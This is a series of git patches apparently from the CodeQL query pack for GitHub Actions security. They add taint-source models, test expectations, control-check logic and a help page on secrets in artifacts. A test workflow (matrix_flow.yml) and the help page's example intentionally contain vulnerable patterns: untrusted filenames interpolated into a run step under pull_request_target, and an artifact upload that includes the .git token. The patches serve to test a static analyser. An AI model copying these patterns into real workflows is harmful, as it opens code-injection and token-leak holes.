Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | @@ -214,6 +222,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 3619941aa12..b9cf0e547ca 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -15,6 +15,9 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 321e5504bc34945054ac2f13d76ae44e4f02e0aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:59:04 +0200 Subject: [PATCH 0502/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0392a200bb4..45d91dcb7cc 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.41 +version: 0.1.42 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5b81393abdb..a41aba95438 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.41 +version: 0.1.42 groups: [actions, queries] suites: codeql-suites extractor: javascript From b199fdc3e255b92dfe57434d6a6316323a6f0ef9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 10:25:10 +0200 Subject: [PATCH 0503/1267] Add new models for file listing actions --- ...riHaximus_github-action-files-in-commit.model.yml | 9 +++++++++ .../ext/manual/ab185508_file-type-finder.model.yml | 10 ++++++++++ .../manual/ankitjain28may_list-files-in-pr.model.yml | 9 +++++++++ .../avraamMavridis_files-changed-action.model.yml | 10 ++++++++++ .../manual/jsmith_changes-since-last-tag.model.yml | 12 ++++++++++++ .../karpikpl_list-changed-files-action.model.yml | 8 ++++++++ ql/lib/ext/manual/knu_changed-files.model.yml | 11 +++++++++++ .../ext/manual/martinhaintz_ga-file-list.model.yml | 8 ++++++++ .../manual/rishabh510_path-lister-action.model.yml | 9 +++++++++ .../manual/the-coding-turtle_ga-file-list.model.yml | 8 ++++++++ .../ext/manual/w3f_action-find-old-files.model.yml | 8 ++++++++ ql/lib/ext/manual/yumemi-inc_changed-files.model.yml | 9 +++++++++ 12 files changed, 111 insertions(+) create mode 100644 ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml create mode 100644 ql/lib/ext/manual/ab185508_file-type-finder.model.yml create mode 100644 ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml create mode 100644 ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml create mode 100644 ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml create mode 100644 ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml create mode 100644 ql/lib/ext/manual/knu_changed-files.model.yml create mode 100644 ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml create mode 100644 ql/lib/ext/manual/rishabh510_path-lister-action.model.yml create mode 100644 ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml create mode 100644 ql/lib/ext/manual/w3f_action-find-old-files.model.yml create mode 100644 ql/lib/ext/manual/yumemi-inc_changed-files.model.yml diff --git a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml new file mode 100644 index 00000000000..e2009c88851 --- /dev/null +++ b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/WyriHaximus/github-action-files-in-commit + - ["WyriHaximus/github-action-files-in-commit", "*", "output.files", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml new file mode 100644 index 00000000000..119b4b1d814 --- /dev/null +++ b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/ab185508/file-type-finder + - ["ab185508/file-type-finder", "*", "output.paths", "filename", "manual"] + - ["ab185508/file-type-finder", "*", "output.names", "filename", "manual"] + - ["ab185508/file-type-finder", "*", "output.extaddpaths", "filename", "manual"] + diff --git a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml new file mode 100644 index 00000000000..e3c9297cf23 --- /dev/null +++ b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/ankitjain28may/list-files-in-pr + - ["ankitjain28may/list-files-in-pr", "*", "output.pullRequestFiles", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml new file mode 100644 index 00000000000..c14bc95c013 --- /dev/null +++ b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/AvraamMavridis/files-changed-action + - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES", "filename", "manual"] + - ["AvraamMavridis/files-changed-action", "*", "output.CHANGED_FILES_EXTENSIONS", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml new file mode 100644 index 00000000000..3a5cf8c8be2 --- /dev/null +++ b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/jsmith/changes-since-last-tag + - ["jsmith/changes-since-last-tag", "*", "output.files", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.added", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.modified", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.removed", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.renamed", "filename", "manual"] + diff --git a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml new file mode 100644 index 00000000000..0d4df5ef6b1 --- /dev/null +++ b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml @@ -0,0 +1,8 @@ + +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/karpikpl/list-changed-files-action + - ["karpikpl/list-changed-files-action", "*", "output.changed_files", "filename", "manual"] diff --git a/ql/lib/ext/manual/knu_changed-files.model.yml b/ql/lib/ext/manual/knu_changed-files.model.yml new file mode 100644 index 00000000000..5e7374dabad --- /dev/null +++ b/ql/lib/ext/manual/knu_changed-files.model.yml @@ -0,0 +1,11 @@ + +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/knu/changed-files + - ["knu/changed-files", "*", "output.changed_files", "filename", "manual"] + - ["knu/changed-files", "*", "output.changed_files_json", "filename", "manual"] + - ["knu/changed-files", "*", "output.matched_files", "filename", "manual"] + - ["knu/changed-files", "*", "output.matched_files_json", "filename", "manual"] diff --git a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml new file mode 100644 index 00000000000..9d0ecf04c6b --- /dev/null +++ b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/martinhaintz/ga-file-list + - ["martinhaintz/ga-file-list", "*", "output.files", "filename", "manual"] + - ["martinhaintz/ga-file-list", "*", "output.file_names", "filename", "manual"] diff --git a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml new file mode 100644 index 00000000000..281602cf0c7 --- /dev/null +++ b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/Rishabh510/Path-lister-action + - ["Rishabh510/Path-lister-action", "*", "output.paths", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml new file mode 100644 index 00000000000..7daafbc2fd8 --- /dev/null +++ b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/the-coding-turtle/ga-file-list + - ["the-coding-turtle/ga-file-list", "*", "output.files", "filename", "manual"] + - ["the-coding-turtle/ga-file-list", "*", "output.file_names", "filename", "manual"] diff --git a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml new file mode 100644 index 00000000000..38d892966d4 --- /dev/null +++ b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/w3f/action-find-old-files + - ["w3f/action-find-old-files", "*", "output.files", "filename", "manual"] + diff --git a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml new file mode 100644 index 00000000000..c65f7b1055f --- /dev/null +++ b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/yumemi-inc/changed-files + - ["yumemi-inc/changed-files", "*", "output.files", "filename", "manual"] + + From 15bb4d851d8210ce97b1d44bec6d7a8edd71b4aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 10:25:31 +0200 Subject: [PATCH 0504/1267] Add new test for flow through matrix --- .../CWE-094/.github/workflows/matrix_flow.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml new file mode 100644 index 00000000000..1093ddd3c4c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml @@ -0,0 +1,29 @@ +name: Matrix Flow + +on: + pull_request_target: + +jobs: + lookup: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.filelist.outputs.file_names }} + steps: + - uses: actions/checkout@v2 + - name: Get all zip files + id: filelist + uses: the-coding-turtle/ga-file-list@v0.1 + with: + directory: "." + file_extension: "zip" + + multi_tenant: + needs: lookup + runs-on: ubuntu-latest + strategy: + matrix: + tenant: ${{fromJson(needs.lookup.outputs.matrix)}} + steps: + - name: Show all files + run: | + echo "this is file: ${{ matrix.TENANT }}" From 5fe81ddb08b18a29bce260d9a052c623e2049931 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 18:07:25 +0200 Subject: [PATCH 0505/1267] Update tests --- ql/test/library-tests/test.expected | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 6bedcadcdba..9205675ac0f 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1327,10 +1327,18 @@ scopes | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | +| Rishabh510/Path-lister-action | * | output.paths | filename | manual | +| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | +| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | +| ab185508/file-type-finder | * | output.names | filename | manual | +| ab185508/file-type-finder | * | output.paths | filename | manual | | ahmadnassri/action-changed-files | * | output.files | filename | manual | | ahmadnassri/action-changed-files | * | output.json | json | manual | | alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | | amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | | cypress-io/github-action | * | env.GH_BRANCH | branch | manual | | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | | eficode/resolve-pr-refs | * | output.head_ref | branch | manual | @@ -1345,16 +1353,30 @@ sources | jitterbit/get-changed-files | * | output.modified | filename | manual | | jitterbit/get-changed-files | * | output.removed | filename | manual | | jitterbit/get-changed-files | * | output.renamed | filename | manual | +| jsmith/changes-since-last-tag | * | output.added | filename | manual | +| jsmith/changes-since-last-tag | * | output.files | filename | manual | +| jsmith/changes-since-last-tag | * | output.modified | filename | manual | +| jsmith/changes-since-last-tag | * | output.removed | filename | manual | +| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | +| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| knu/changed-files | * | output.changed_files | filename | manual | +| knu/changed-files | * | output.changed_files_json | filename | manual | +| knu/changed-files | * | output.matched_files | filename | manual | +| knu/changed-files | * | output.matched_files_json | filename | manual | | lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | | marocchino/on_artifact | * | output.* | artifact | manual | +| martinhaintz/ga-file-list | * | output.file_names | filename | manual | +| martinhaintz/ga-file-list | * | output.files | filename | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | +| the-coding-turtle/ga-file-list | * | output.files | filename | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | | trilom/file-changes-action | * | output.files | filename | manual | @@ -1362,7 +1384,9 @@ sources | trilom/file-changes-action | * | output.files_modified | filename | manual | | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| w3f/action-find-old-files | * | output.files | filename | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | +| yumemi-inc/changed-files | * | output.files | filename | manual | summaries | ActionsTools/read-json-action | * | artifact | output.* | taint | manual | | BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | From 48a0fd500d630e840e2797dd4cea2420e8658365 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 18:09:05 +0200 Subject: [PATCH 0506/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 45d91dcb7cc..cf4acd613e3 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.42 +version: 0.1.43 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a41aba95438..a5cff260536 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.42 +version: 0.1.43 groups: [actions, queries] suites: codeql-suites extractor: javascript From 69818c5bb5a22c0d6327d572be0eb8f1b266fd98 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 12 Sep 2024 09:58:21 +0200 Subject: [PATCH 0507/1267] Remove bindingset from DataFlow's compatibleTypes --- ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 2d391841410..0d214c63c5d 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -166,8 +166,7 @@ class DataFlowType extends TDataFlowType { string ppReprType(DataFlowType t) { none() } -bindingset[t1, t2] -predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } +predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { any() } predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } From 3a390582991cee93903a38be9f064237ae8f6af3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 12 Sep 2024 10:42:12 +0200 Subject: [PATCH 0508/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index cf4acd613e3..0e019d05e86 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.43 +version: 0.1.44 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a5cff260536..83c273431e1 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.43 +version: 0.1.44 groups: [actions, queries] suites: codeql-suites extractor: javascript From 69b9542a5f4c6ab446e71c1423f9a6caf8ba1b3c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 17 Sep 2024 17:06:50 +0200 Subject: [PATCH 0509/1267] Add help file for SecretsInArtifacts query --- ql/src/Security/CWE-312/SecretsInArtifacts.md | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 ql/src/Security/CWE-312/SecretsInArtifacts.md diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.md b/ql/src/Security/CWE-312/SecretsInArtifacts.md new file mode 100644 index 00000000000..5b05c9a118f --- /dev/null +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.md @@ -0,0 +1,47 @@ +# Storage of sensitive information in GitHub Actions artifact + +## Description + +Sensitive information included in a GitHub Actions artifact can allow an attacker to access the sensitive information if the artifact is published. + +## Recommendation + +Only store information that is meant to be publicly available in a GitHub Actions artifact. + +## Example + +The following example uses `actions/checkout` to checkout code which stores the GITHUB_TOKEN in the \`.git/config\` file and then stores the contents of the \`.git\` repository into the artifact: + +```yaml +name: secrets-in-artifacts +on: + pull_request: +jobs: + a-job: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . +``` + +The issue has been fixed below, where the `actions/upload-artifact` uses a version (v4+) which does not include hidden files or directories into the artifact. + +```yaml +name: secrets-in-artifacts +on: + pull_request: +jobs: + a-job: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@v4 + with: + name: file + path: . +``` From 92f3b1614c16889ab32a6bc0fcfb7be2fced9c40 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 17 Sep 2024 17:07:35 +0200 Subject: [PATCH 0510/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0e019d05e86..285f9cfe523 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.44 +version: 0.1.45 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 83c273431e1..3c02acfff19 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.44 +version: 0.1.45 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4f075f3f36679d9b289585bd967889c7def84104 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 13:38:08 +0200 Subject: [PATCH 0511/1267] feat: Improve sanitizer checks --- ql/lib/codeql/actions/Helper.qll | 3 +- .../codeql/actions/security/ControlChecks.qll | 148 +++++++++++------- .../config/externally_triggereable_events.yml | 5 +- .../Security/CWE-074/OutputClobberingHigh.ql | 14 +- .../CWE-077/EnvPathInjectionCritical.ql | 14 +- .../CWE-077/EnvVarInjectionCritical.ql | 19 ++- .../CWE-088/ArgumentInjectionCritical.ql | 8 +- .../Security/CWE-094/CodeInjectionCritical.ql | 6 + .../CWE-349/CachePoisoningViaCodeInjection.ql | 4 +- .../CWE-349/CachePoisoningViaDirectCache.ql | 4 +- .../CachePoisoningViaPoisonableStep.ql | 4 +- .../UntrustedCheckoutTOCTOUCritical.ql | 7 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 7 +- .../CWE-829/UntrustedCheckoutCritical.ql | 31 +++- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 23 ++- .../CWE-829/.github/workflows/test11.yml | 94 +++++++++++ .../CWE-829/.github/workflows/test12.yml | 96 ++++++++++++ .../CWE-829/.github/workflows/test13.yml | 31 ++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 11 +- .../CWE-829/UntrustedCheckoutHigh.expected | 1 + 21 files changed, 450 insertions(+), 81 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 1d88f6f6511..9ac67575b8b 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -248,8 +248,7 @@ predicate inPrivilegedCompositeAction(AstNode node) { predicate inPrivilegedExternallyTriggerableJob(AstNode node) { exists(Job j | j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() and - not exists(ControlCheck check, Event e | j.getATriggerEvent() = e | check.protects(node, e)) + j.isPrivilegedExternallyTriggerable() ) } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 2d8e60dca37..650ae8d8105 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -1,17 +1,46 @@ import actions +string any_relevant_category() { + result = + [ + "untrusted-checkout", "output-clobbering", "envpath-injection", "envvar-injection", + "command-injection", "argument-injection", "code-injection", "cache-poisoning", + "untrusted-checkout-toctou", "artifact-poisoning" + ] +} + +string any_non_toctou_category() { + result = any_relevant_category() and not result = "untrusted-checkout-toctou" +} + +string any_relevant_event() { + result = + [ + "pull_request_target", + "issue_comment", + "pull_request_comment", + "workflow_run", + "issues", + "fork", + "watch", + "discussion_comment", + "discussion" + ] +} + /** An If node that contains an actor, user or label check */ abstract class ControlCheck extends AstNode { ControlCheck() { this instanceof If or this instanceof Environment or - this instanceof UsesStep + this instanceof UsesStep or + this instanceof Run } - predicate protects(Step step, Event event) { + predicate protects(Step step, Event event, string category) { event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and - this.getAProtectedEvent() = event.getName() and - this.dominates(step) + this.dominates(step) and + this.protectsCategoryAndEvent(category, event.getName()) } predicate dominates(Step step) { @@ -30,80 +59,71 @@ abstract class ControlCheck extends AstNode { step.getEnclosingJob().getANeededJob().getEnvironment() = this ) or - this.(UsesStep).getAFollowingStep() = step + this.(Step).getAFollowingStep() = step } - abstract string getAProtectedEvent(); - - abstract boolean protectsAgainstRefMutationAttacks(); + abstract predicate protectsCategoryAndEvent(string category, string event); } abstract class AssociationCheck extends ControlCheck { - // checks who you are (identity) - // association checks are effective against pull requests since they can control who is making the PR - // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR - // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // Checks if the actor is a COLLABORATOR of the repo + // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + } } abstract class ActorCheck extends ControlCheck { - // checks who you are (identity) - // actor checks are effective against pull requests since they can control who is making the PR - // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR - // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval - override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } - - override boolean protectsAgainstRefMutationAttacks() { result = true } + // checks for a specific actor + // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR + // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + override predicate protectsCategoryAndEvent(string category, string event) { + event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + 